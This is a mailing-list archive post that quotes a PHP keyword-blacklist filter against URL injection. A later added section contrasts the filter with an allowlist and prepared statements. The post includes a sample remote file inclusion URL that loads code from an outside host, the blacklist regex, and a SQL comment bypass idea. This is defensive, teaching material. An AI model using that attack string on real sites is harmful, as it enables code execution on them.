[Linux-programlama] Against URL attacks

---------


From: huseyin mert (huseyinin@gmail.com)
Date: Mon 27 Aug 2007 - 09:35:37 EEST


<?php

// ====================================================================
//
// Avoid URL injection code. Easy to improve the security (phishing, etc.)
// of all your site when you are calling one .php to centralize all your
// DB connections.
//
// mailto: Vicente<sysvic@gmail.com>
//
// ====================================================================

$req = $_SERVER['REQUEST_URI'];
$cadena = explode("?", $req, 2);              // limit 2: keep everything after the first "?"
$mi_url = $cadena[0];                         // script path
$resto = isset($cadena[1]) ? $cadena[1] : ''; // query string ('' when there is none)

// here you can put your suspicious chains at your will. Just be careful of
// possible coincidences with your URL's variables and parameters
$inyecc =
'/script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|AND|exe|exec|INSERT|tmp/i';

// detecting
if (preg_match($inyecc, $resto)) {

   // make something, for example send an e-mail alert to the administrator
   // ($_SERVER replaces the long-deprecated $HTTP_SERVER_VARS; headers that
   // may be absent are read with isset() to avoid notices)
   $ip = isset($_SERVER["HTTP_CLIENT_IP"]) ? $_SERVER["HTTP_CLIENT_IP"] : '';
   $forwarded = isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : '';
   $remoteaddress = $_SERVER["REMOTE_ADDR"];

   $message = "attack injection in $mi_url\n\n"
            . "chain: $resto\n\n"
            . "from: (ip-forw-RA):- $ip - $forwarded - $remoteaddress\n\n"
            . "--------- end --------------------";

   mail("youremail@email.com",
        "Attack injection", $message,
        "From: host@{$_SERVER['SERVER_NAME']}",
        "-fwebmaster@{$_SERVER['SERVER_NAME']}");

   // message and kill execution
   echo 'illegal url';
   die();
}

// From here you can start safely your DB connection
$connection = mysql_connect(); //..etc.

?>

Usage Example

* URL Attack:
http://www.mydomain.com/index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w

* Response:
"illegal url"

* E-mail sent to administrator:

attack injection in /home/mydomain/public_html/index.php

chain: /index.php?page=http://www.geocities.com/df_animes/tool25.txt?&cmd=w

from: (ip-forw-RA): - - 85.50.130.156
-----------------------------------------------------------
original address: http://www.zend.com/code/codex.php?id=1543&single=1

I really liked a piece of code I found on Zend; I'd like your opinions on how
much security it actually provides.
The first thing that came to my mind: could it be bypassed by writing
SE/**/LECT instead of SELECT?

_______________________________________________
Linux-programlama mailing list
Linux-programlama@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-programlama
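The following is an added example, not part of the post above or of the Zend codex snippet it quotes. It reproduces the posted blacklist regex only to compare it with the controls that actually address the two problems the regex tries to catch: an allowlist for the `page` parameter (against the remote file inclusion shown in the usage example) and PDO prepared statements (against SQL injection, including the SE/**/LECT variant the poster asks about). The names `BLACKLIST`, `ALLOWED_PAGES`, `blacklistFlags`, `resolvePage` and `findUserByName` are hypothetical, the query strings and the in-memory SQLite table are constructed for the demonstration, and the `pdo_sqlite` extension is assumed to be available.

```php
<?php
// Added example; not from the post above or from the Zend codex snippet.
// Compares the posted blacklist with an allowlist and prepared statements.
declare(strict_types=1);

// The regex from the posted snippet, reproduced for comparison only.
const BLACKLIST = '/script|http|<|>|%3c|%3e|SELECT|UNION|UPDATE|AND|exe|exec|INSERT|tmp/i';

function blacklistFlags(string $queryString): bool
{
    return preg_match(BLACKLIST, $queryString) === 1;
}

// Hypothetical allowlist: the only values `page` may take, mapped to files.
// Request data is never used as a path, so a value such as
// page=http://.../tool25.txt can never reach include().
const ALLOWED_PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolvePage(?string $page): ?string
{
    if ($page === null || $page === '') {
        return ALLOWED_PAGES['home'];
    }
    return ALLOWED_PAGES[$page] ?? null;   // unknown key -> null (answer with a 404)
}

// Parameterised lookup: the value is bound, never concatenated into SQL,
// so SELECT, UNION, SE/**/LECT and the like arrive as plain string data.
function findUserByName(PDO $pdo, string $name): ?array
{
    $stmt = $pdo->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// ---- constructed inputs for the demonstration ----------------------------

// 1. The blacklist both over-matches and under-matches.
$queries = [
    'page=home&q=brand'            => 'legitimate, but "brand" contains AND',
    'page=contact&file=report.exe' => 'legitimate, but "exe" is blacklisted',
    'id=1 SE/**/LECT 1'            => 'the bypass asked about in the post',
];
foreach ($queries as $qs => $why) {
    printf("%-30s %-5s  %s\n", $qs, blacklistFlags($qs) ? 'BLOCK' : 'pass', $why);
}
// The first two are blocked (false positives); the third passes (false negative).

// 2. The allowlist decides by key, without inspecting the value at all.
foreach (['home', 'about', 'http://www.geocities.com/df_animes/tool25.txt'] as $p) {
    printf("page=%-48s -> %s\n", $p, resolvePage($p) ?? '404');
}

// 3. Prepared statement against a constructed in-memory SQLite table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$pdo->exec("INSERT INTO users (name) VALUES ('alice')");

var_dump(findUserByName($pdo, 'alice'));                     // id 1, name alice
var_dump(findUserByName($pdo, "alice' UNION SE/**/LECT 1,2")); // NULL: a literal, unmatched name
```

Run it with `php example.php`. The point of part 1 is that a substring blacklist on the query string is neither a reliable detector (the comment trick slips through) nor a safe one (ordinary words such as "brand" trip it), so it can at most serve as an alerting heuristic; parts 2 and 3 are the controls that make the `page` and SQL inputs safe regardless of what the attacker types.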



---------

This archive was generated by hypermail 2.1.2.